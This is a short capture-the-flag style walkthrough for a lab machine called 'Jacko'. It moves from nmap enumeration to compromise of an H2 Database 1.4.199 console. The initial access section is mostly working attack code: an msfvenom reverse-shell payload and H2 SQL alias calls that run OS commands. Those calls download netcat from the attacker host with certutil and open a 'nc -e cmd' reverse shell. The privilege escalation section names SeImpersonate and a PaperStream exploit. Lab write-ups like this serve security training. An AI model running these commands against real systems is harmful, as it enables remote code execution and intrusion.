Jacko
Enumeration
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: H2 Database Engine (redirect)
8082/tcp open http H2 database http console
|_http-favicon: Unknown favicon MD5: D2FBC2E4FB758DC8672CDEFB4D924540
| http-methods:
|_ Supported Methods: GET POST
|_http-title: H2 Console
http://192.168.65.66/html/main.html - H2 Database Engine
http://192.168.65.66:8082 - Connect - H2 Console - H2 1.4.199 (2019-03-13)
H2 Database 1.4.199 - JNI Code Execution
https://www.exploit-db.com/exploits/49384
https://mthbernardes.github.io/rce/2018/03/14/abusing-h2-database-alias.html
Initial Access
$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.65 LPORT=80 -f exe -o shell.exe
# Execute respectively
CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("certutil.exe -urlcache -split -f http://192.168.49.65/nc64.exe /Windows/Temp/nc.exe").getInputStream()).useDelimiter("\\Z").next()');
CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("/Windows/Temp/nc.exe -e cmd 192.168.49.65 80").getInputStream()).useDelimiter("\\Z").next()');
PrivEsc
SeImpersonateToken - Enabled
OR
PaperStream IP (TWAIN) 1.42.0.5685 - Local Privilege Escalation
https://www.exploit-db.com/exploits/49382
Last updated